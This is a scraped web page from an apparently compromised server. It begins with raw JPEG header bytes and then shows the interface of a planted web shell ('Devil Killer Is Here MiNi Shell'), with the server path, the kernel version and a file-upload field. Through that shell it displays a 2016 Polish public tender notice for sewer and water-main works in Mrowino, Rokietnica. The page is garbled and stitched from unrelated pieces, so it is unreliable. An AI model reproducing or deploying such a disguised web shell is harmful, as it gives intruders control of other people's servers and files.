JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160513/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160513/53271-N-2016.html

<p class="kh_header"><b>Rokietnica: Poprawa gospodarki ściekowej na terenie miejscowości Mrowino, gmina Rokietnica</b><br>
<b>Numer ogłoszenia: 53271 - 2016; data zamieszczenia: 13.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Usług Komunalnych sp. z o.o. , Bytkowo, ul. Topolowa 6, 62-090 Rokietnica, woj. wielkopolskie, tel. 61 814 57 43, faks 61 814 58 38.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.puk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa gospodarki ściekowej na terenie miejscowości Mrowino, gmina Rokietnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedsięwzięcie składa się pięć zadań  inwestycyjnych:
1. Sieć kanalizacji sanitarnej Mrowino rejon ul. Poznańskiej i Południowej gm. Rokietnica.
Realizacja zadania ma na celu umożliwienie odbioru ścieków z nieruchomości zlokalizowanych wzdłuż odcinka ulicy Poznańskiej oraz odcinka ulicy Południowej w miejscowości Mrowino, gmina Rokietnica. Zaprojektowany został odcinek kanalizacji sanitarnej grawitacyjnej. Wykonany zostanie z rur PVC-U o średnicy 200 mm SN8 SDR34 S16,) kielichowych łączonych na uszczelki gumowe. W miejscu włączenia do istniejącego odcinka sieci i na samej sieci zaprojektowane zostały studnie rewizyjne o średnicy minimum 1000 mm. Do sieci kanalizacji grawitacyjnej zostaną włączone kanały boczne o średnicy 160 mm, zaprojektowane z rur PVC-U SN8 SDR34 S16,7 o średnicy 160 mm, wyprowadzone do granicy działek planowanych do podłączenia do sieci kanalizacji sanitarnej. 
Łączna długość zaprojektowanej sieci kanalizacyjnej wyniesie - 473,5 m.
Projektowana sieć zostanie włączona do studni zlokalizowanej w ulicy Południowej, projektowanej i wykonanej w ramach poprzednich zadań. Dalej ścieki istniejącym systemem rurociągów tłocznych i przepompowni trafiać będą do oczyszczalni ścieków w miejscowości Bytkowo, gm. Rokietnica.

2. Sieć kanalizacji sanitarnej Mrowino ul. Tarnowska, Polna, Błotna, gm. Rokietnica.
Przedmiotem niniejszej inwestycji jest budowa sieci kanalizacji w ulicy Tarnowskiej oraz w przyległych do niej ulicach Polnej oraz Błotnej w miejscowości Mrowino, gm. Rokietnica. Inwestycja pozwoli na skanalizowanie w.w rejonu. Parametry techniczne projektowanej sieci pozwolą na włączenie się do niej kolejnych projektowanych budynków zlokalizowanych przy w.w ulicach.
Zaprojektowano odcinki kanalizacji sanitarnej grawitacyjnej. Projektowane rurociągi zostaną wykonane z rur PVC-U SN8 SDR34 S16,7 o średnicach 250 oraz 200 mm, kielichowych łączonych na uszczelki gumowe. Na sieci zostaną wybudowane studnie rewizyjne betonowe o średnicy minimum 1000 mm. Do sieci zostaną włączone kanały boczne o średnicy 160 mm, zaprojektowane z rur PVC-U SN8 SDR34 S16,7 o średnicy 160 mm, wyprowadzone do granicy działek planowanych do podłączenia do sieci kanalizacji sanitarnej.
Rurociąg tłoczny wykonany zostanie z rur PE 100 PN10 SDR17 o średnicy 90 razy 5,4 mm. Zostanie on włączony z projektowanej przepompowni ścieków do projektowanej studni S8, która pełnić będzie role studni rozprężnej. Przepompownia ścieków zostanie zlokalizowana przy ulicy Tarnowskiej w m. Mrowino. Projektowana sieć zostanie włączona do istniejącego odcinka sieci kanalizacji sanitarnej w ulicy Tarnowskiej, wybudowanego w ramach inwestycji prowadzonej w latach 2014-2015. Następnie ścieki poprzez przepompownię zlokalizowaną w miejscowości Mrowino trafią do oczyszczalni ścieków w Bytkowie. 
Łączna długość zaprojektowanej sieci kanalizacyjnej wyniesie - 2 769 m.

3. Sieć kanalizacji sanitarnej Mrowino ul Kokoszczyńska i Złoty Łan, gm. Rokietnica.
Realizacja zadania objętego projektem pozwoli na skanalizowanie ulicy Kokoszczyńskiej oraz przyległej do niej ulicy Złoty Łan. Parametry techniczne projektowanej sieci zapewniają możliwość włączenia się do niej kolejnych projektowanych budynków zlokalizowanych przy ulicy Kokoszczyńskiej, a także włączenie do niej w przyszłości kanalizacji sanitarnej z miejscowości Przybroda. 
Zaprojektowano rurociąg grawitacyjny z rur PVC-U SN8 SDR34 S16,7 z rur o średnicy 250 oraz 200 mm. Na sieci zbudowane zostaną studnie rewizyjne betonowe o średnicy minimum 1000 mm. 
Do sieci zostaną włączone kanały boczne o średnicy 160 mm, zaprojektowane z rur PVC-U SN8 SDR34 S16,7 o średnicy 160 mm, wyprowadzone do granicy działek planowanych do podłączenia do sieci kanalizacji sanitarnej.
Zaprojektowano dwa rurociągi tłoczne. Pierwszy zawierający odcinek od projektowanej pompowni ścieków POM1 zlokalizowanej przy ulicy Kokoszczyńskiej do projektowanej na sieci grawitacyjnej studni rewizyjnej S7 wykonany zostanie z rur PE 100 PN10 SDR17 o średnicy 110 razy 6,6 mm. Dalej odcinkiem kanalizacji sanitarnej grawitacyjnej o średnicy 250 mm zostanie włączony do istniejącej już studni SW, wykonanej w ramach wcześniejszych inwestycji.
Drugi rurociąg tłoczny zawierający odcinek od projektowanej pompowni ścieków POM2 zlokalizowanej przy ulicy Kokoszczyńskiej i kończącej projektowaną sieć do projektowanej na sieci grawitacyjnej studni rewizyjnej S36 wykonany zostanie z rur PE 100 PN10 SDR17 o średnicy 90 razy 5,4 mm. Następnie ścieki poprzez istniejącym systemem rurociągów tłocznych i przepompowni spławione zostaną do oczyszczalni ścieków w miejscowości Bytkowo, gm. Rokietnica. Łączna długość zaprojektowanej sieci kanalizacyjnej wyniesie - 2 566,5 m.

4. Przebudowa sieci kanalizacji sanitarnej Mrowino ul. Dworcowa i Szkolna, gm. Rokietnica
Celem inwestycji jest przebudowa sieci kanalizacji sanitarnej w Mrowinie, w ulicach Dworcowej oraz Szkolnej mająca na celu wyłączenie z eksploatacji istniejącej już w tym obszarze sieci kanalizacji podciśnieniowej. Po wykonaniu sieci kanalizacji sanitarnej grawitacyjnej w centralnej części miejscowości Mrowino, a także projektów zakładających grawitacyjny odbiór ścieków z pozostałej części wsi, pozostawienie układu podciśnieniowego w ulicy Dworcowej jest nieuzasadnione ekonomicznie, stąd planowana jest przebudowa sieci.
Projektowany z rur PVC-U SN8 SDR34 S16.7 o średnicy 200 mm rurociąg grawitacyjny włączony zostanie do istniejącej sieci kanalizacji grawitacyjnej w ulicy Szkolnej w Mrowinie. Następnie ściek będzie spławiany do pompowni ścieków zlokalizowanej w ulicy Ogrodowej w Mrowinie, skąd zostanie przetłoczony na oczyszczalnię ścieków w Bytkowie. Na sieci zaprojektowano studnie rewizyjne wykonane z tworzywa sztucznego o średnicy 400 mm.
Łączna długość zaprojektowanej sieci kanalizacyjnej wyniesie - 200 m.

 5. Sieć wodociągowa w ulicy Kokoszczyńskiej w Mrowinie
Celem zadania jest wybudowanie nowej sieci wodociągową w ul. Kokoszczyńskiej w Mrowinie wraz z przełączeniem 35 posesji.  
Długość projektowanej sieci o średnicy 160 w ulicy Kokoszczyńskiej to 1553,50 m, natomiast sieci o średnicy 110 mm to 28,00 m. Sieć należy wykonać z rur PE100 PN 10 SDR 17 o średnicy 160 razy 9,5 mm i 110 razy 6,6 mm.
Włączenie projektowanej sieci do istniejącej sieci wodociągowej w ulicy Kokoszczyńskiej W1 wykonać poprzez zainstalowanie na istniejącej sieci trójnika żeliwnego kołnierzowego 150 przez 150 mm. Po każdej ze stron trójnika zainstalować zasuwę żeliwną kołnierzową z miękkim uszczelnieniem klina o średnicy 150 mm ilość zasuw 3 Zasuwy wyposażyć w obudowy teleskopowe zabezpieczone skrzynkami żeliwnymi.
Do projektowanej sieci wodociągowej w ulicy Kokoszczyńskiej wpiętą będą istniejące i projektowane rurociągi boczne o średnicach 110 mm. Miejsca te oznaczone zostały na mapie zasadniczej oraz profilu podłużnym sieci WW1 - WW7. W węzłach tych zabudować trójniki żeliwne kołnierzowe o średnicach 150 przez 100 mm. Również w tych przypadkach po każdej ze stron trójnika zabudować należy zasuwy odcinające ilość zasuw 3 dwie o średnicy 150 mm i jedną o średnicy 100 mm. Łączna ilość zasuw w tycz węzłach to 14 zasuw o średnicy 150 mm i 7 zasuw o średnicy 100 mm. Zasuwy wyposażyć należy w obudowy i skrzynki żeliwne jw.
Za zasuwą o średnicy 110 mm wykonać należy w każdym przypadku ok. 4,0 m sieci wodociągowej z rury PE 100 PN10 SDR 17 o średnicy 110 razy 6,6 do połączenia z istniejącymi sieciami, lub do granicy pasa drogowego. Łączna długość sieci o średnicy 110 mm to 28,00 m. Połączenie z istniejącymi sieciami wykonać poprzez zamontowanie na nowoprojektowanym rurociągu tulei kołnierzowej 110 wraz z kołnierzem dociskowym 100 mm, natomiast na rurociągu istniejącym przełączanym złączki dwukołnierzowej wraz z króćcem FW o średnicy 100 mm. Ilość przełączeń 5 sztuk. 
Na projektowanej sieci w ulicy Kokoszczyńskiej zaprojektowano 10 hydrantów nadziemnych o średnicy 80 mm. W węźle hydrantowym zaprojektowano trójniki żeliwne kołnierzowe o średnicach 150 przez 80 mm. Bezpośrednio za trójnikiem na odgałęzieniu o średnicy 80 mm zabudować zasuwy odcinające o średnicy 80 mm, według specyfikacji podanej powyżej. Za zasuwą w każdym przypadku wykonać około 2,0 m rurociągu PE 100 PN10 SDR 17 o średnicy 90 razy5,4 mm i dopiero na nim zabudowywać kompletny hydrant wynika to z lokalizacji sieci. Łączna długość rurociągu o średnicy 90 mm to 20,00 m.
Przejścia rurociągów pod rowami melioracyjnymi wykonać metodą przewiertu w rurach ochronnych PE TS o średnicy 250 razy 22,7 m. 
Długość przewiertu pod rowem melioracyjnym dz. 73 i 82 to 7,00 m
Długość przewiertu pod rowem melioracyjnym dz. 76 i 68 to 8,00 m 
Głębokość posadowienia rury ochronnej zgodnie z profilem podłużnym.
Zaprojektowano przełączenie w Ul. Kokoszczyńskiej około 35 sztuk istniejących przyłączy do nowej sieci. Przyłącza do budynku wykonać przez zainstalowanie na projektowanym wodociągu o średnicy 160 mm nawiertek NWZ o średnicy 150 mm z zasuwą na 110 mm nawiertek NWZ o średnicy 100mm. Na nawiertkach zabudować obudowę teleskopową oraz skrzynkę żeliwną umocowaną płytą betonową. Za nawiertką przyłącze prowadzić rurą fi 32 razy 2,9 mm PE PN10. Przyłączenie nawiertki z rurą PE wykonać za pomocą złączki zaciskowej. Minimalne przykrycie wierzchu rury hmin równa się  1,4 m. Przewidywana długość wykonanych przełączeń rurą fi 32 razy 2,9 mm wyniesie 245 mb..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje możliwość   udzielenia zamówień uzupełniających do zamówienia podstawowego w trybie zamówienia z wolnej ręki na zasadach określonych w art.67 ust.1 pkt 6 ustawy do 10% wartości zamówienia podstawowego polegających na wykonaniu tego samego rodzaju robót budowlanych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.24.40-8, 45.23.24.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępujący do przetargu wykonawcy zobowiązani są przed upływem terminu składania ofert do wniesienia wadium w wysokości  - 50.000 PLN pięćdziesiąt tysięcy złotych
Wadium może być wnoszone w jednej lub kilku następujących formach 
      a)	pieniądzu,
b) 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) 	gwarancjach bankowych,
d) 	gwarancjach ubezpieczeniowych,
e) 	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  Dz. U. 2010 r, poz. 620.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego Bank Zachodni WBK Nr rachunku WBK 73 1090 2590 0000 0001 3126 8492 dopiskiem Wadium - Poprawa gospodarki ściekowej na terenie miejscowości Mrowino, gmina Rokietnica w takim czasie, aby pieniądze znalazły się na rachunku Zamawiającego  przed upływem terminu składania ofert. 
2. Jeżeli wadium wnoszone jest w innej formie niż pieniądz, oryginał odpowiedniego dokumentu wraz z jego kopią potwierdzoną za zgodność z oryginałem dołączony jest do oferty. 
Oryginał należy załączyć do oferty w taki sposób, aby umożliwić zamawiającemu jego wyjęcie i zwrot bez uszkadzania oferty.
Z treści gwarancji lub poręczenia musi wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta (poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy. 
3. Wykonawca, którego oferta nie będzie zabezpieczona wadium zostanie wykluczony z postępowania przetargowego.
4 Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty      najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem pkt 5 poniżej. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art.24 ust.2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art.87 ust.2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:
- wykonał  w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 robotę  budowlaną  polegającą na budowie lub przebudowie sieci kanalizacji sanitarnej lub deszczowej o wartości nie mniejszej niż 2 000 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje osobą, która będzie pełnić funkcję kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych oraz co najmniej jednoroczne doświadczenie zawodowe liczone od dnia uzyskania uprawnień.
Uwaga: 
Kierownik budowy powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jedn. Dz. U. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konferencji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 18 marca 2008 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. nr 63.poz.394 z  późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową na kwotę co najmniej 1 400 000 zł. jeden milion czterysta tysięcy złotych PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy.
Harmonogram rzeczowo-finansowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Okres gwarancji - 4</li>
</ul>
